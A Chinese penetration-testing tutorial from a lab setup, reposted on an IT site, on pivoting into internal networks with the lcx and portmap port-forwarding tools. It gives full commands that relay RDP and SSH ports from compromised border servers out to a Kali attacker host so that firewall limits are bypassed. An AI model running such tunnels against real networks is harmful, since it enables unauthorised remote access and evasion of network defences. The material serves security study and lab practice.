IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 【渗透测试笔记】之【内网渗透——传输层隧道(lcx(portmap)的使用)】 -> 正文阅读

[系统运维]【渗透测试笔记】之【内网渗透——传输层隧道(lcx(portmap)的使用)】

实验环境

kali(攻击机,外网地址:192.168.8.48)
Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)
CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:10.1.1.13)
Windows2012(DC,内网地址:10.1.1.2)
在这里插入图片描述

1 下载与部署

下载地址:https://github.com/AA8j/SecTools/tree/main/lcx
注意:Linux下为portmap。

2 使用方法

2.1 本地端口映射

假如此时已经拿到了边界服务器的权限,但是由于防火墙策略限制导致3389端口无法出网,此时可以将此端口映射到可以出网的端口。

2.1.1 边界服务器为Windows的情况

Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)

lcx -tran 53 192.168.8.56 3389

在这里插入图片描述
效果演示
此时远程桌面连接192.168.8.56的53端口即可:
在这里插入图片描述
在这里插入图片描述
此时会有数据日志:
在这里插入图片描述

2.1.2 边界服务器为Linux的情况

使用ssh端口转发更方便。在应用层隧道会讲到。

2.2 本地端口转发

假如此时已经拿到了边界服务器Windows2012的权限,但是由于防火墙限制,无法进网,但可以出网,此时就可以将边界服务器的端口转发到kali上,然后访问kali的端口。

2.2.1 边界服务器为Windows的情况

kali(攻击机,外网地址:192.168.8.48)

./portmap -m 2 -p1 4444 -h2 127.0.0.1 -p2 3389
./portmap -m 2 -p1 4444(本机监听端口) -h2 127.0.0.1(转发到目的IP) -p2 3389(转发到目的端口)
# 表示监听本机的4444端口,并转发到127.0.0.1的3389端口。


m的参数说明:
1.监听port1 (p1)端口并且连接主机2(h2)的port2(p2) 端口
2.监听port1(p1)和port2(p2) 端口
3.连接主机1(h1)对应的端口和主机2(h2)对应的端口

在这里插入图片描述

Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)

lcx.exe -slave 192.168.8.48 4444 127.0.0.1 3389
lcx.exe -slave 192.168.8.48(转发到目的IP) 4444(转发到目的端口) 127.0.0.1 3389(转发的本地端口)
# 表示将本地的3389端口转发到192.168.8.48的4444端口

在这里插入图片描述

效果演示
此时通道就已经打通了,远程桌面连接kali(192.168.8.48)即会连接到内网的Windows2012。
在这里插入图片描述
在这里插入图片描述
此时两端都会有数据日志显示:
在这里插入图片描述
在这里插入图片描述

2.2.2 边界服务器为Linux的情况

kali(攻击机,外网地址:192.168.8.48)

./portmap -m 2 -p1 4444 -h2 127.0.0.1 -p2 222
./portmap -m 2 -p1 4444(本机监听端口) -h2 127.0.0.1(转发到目的IP) -p2 222(转发到目的端口)
# 表示监听本机的4444端口,并转发到127.0.0.1的222端口。

在这里插入图片描述

CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:10.1.1.13)

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.8.48 -p2 4444
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.8.48(kali) -p2 4444
# 将本地的22端口转发到192.168.8.48的4444端口

在这里插入图片描述

效果演示
此时CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:10.1.1.13)的ssh端口就被转发到了kali(攻击机,外网地址:192.168.8.48)的222端口上,尝试连接:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
此时两端同样有数据日志:
在这里插入图片描述
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-10-17 12:20:35  更:2021-10-17 12:21:25 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 19:36:25-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码